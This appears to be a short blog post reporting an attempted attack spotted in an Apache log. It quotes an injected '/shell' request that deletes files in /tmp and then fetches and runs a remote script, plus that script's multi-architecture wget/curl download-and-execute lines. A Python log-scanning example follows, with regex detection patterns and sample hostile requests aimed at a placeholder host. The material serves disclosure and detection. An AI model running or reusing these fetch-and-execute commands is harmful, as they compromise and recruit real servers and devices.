Multi-Architecture Hack Attempt
28 May 2021, 8:01 p.m.
Saw a line like this pop up in the Apache log on my public-facing server from yesterday:
"GET /shell?cd+/tmp;rm+-rf+*;wget+ «redacted»/jaws;sh+/tmp/jaws"
I checked, and the file it is trying to fetch and execute still exists. It consists of about a dozen lines, all of this form:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget «redacted»/z0r0.«ext»; curl -O «redacted»/z0r0.«ext»; cat z0r0.«ext» >zeros6x; chmod +x *; ./zeros6x jaws.exploit
all differing only in «ext», with values like “mips” and “mpsl” and “ppc”, “arm”, “arm5”, “arm6”, “arm7”, even “m68k”, plus of course “x86” and “i686”.
Lawrence D'Oliveiro
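
One way to spot requests like the one quoted in the post when reviewing an Apache access log, as an added example that is not part of the original post: it URL-decodes each query string and flags those that combine a `wget`/`curl` download with a step that runs the result. The function name, the log entries, the addresses and the `example.invalid` host are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Client address, request line and status of an Apache common/combined log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Download tool followed by its first non-option argument (what is being fetched).
FETCH_RE = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*([^\s;|&]+)')
# A command separator directly followed by something that runs a file.
EXEC_RE = re.compile(r'[;|&]\s*(?:(?:sh|bash)\b|chmod\s+\+x|\./)')

def find_fetch_and_run(lines):
    """Return one finding per request whose query string decodes to
    'download something, then execute it' shell syntax."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        path, _, query = m.group("target").partition("?")
        decoded = unquote_plus(query)  # '+' and %xx back to the text a shell would see
        fetched = FETCH_RE.findall(decoded)
        if fetched and EXEC_RE.search(decoded):
            findings.append({"ip": m.group("ip"), "path": path,
                             "status": int(m.group("status")),
                             "fetched": fetched, "command": decoded})
    return findings

# Constructed sample entries: documentation addresses, placeholder host and statuses.
SAMPLE = [
    '192.0.2.10 - - [27/May/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 5123',
    '198.51.100.7 - - [27/May/2021:03:15:42 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://example.invalid/jaws;sh+/tmp/jaws HTTP/1.1" 404 196',
    '192.0.2.11 - - [27/May/2021:03:16:01 +0000] "GET /search?q=wget+tutorial;+curl+basics HTTP/1.1" 200 880',
    '203.0.113.5 - - [27/May/2021:03:17:30 +0000] "GET /cgi-bin/x?a=1%3Bcurl+-O+http://example.invalid/z%3Bchmod+%2Bx+z HTTP/1.1" 404 196',
]

if __name__ == "__main__":
    for f in find_fetch_and_run(SAMPLE):
        print(f["ip"], f["path"], f["status"], f["fetched"])
```

The third sample entry mentions both tools but has no execute step, so it is not reported; the fourth is caught only because the query string is decoded before matching.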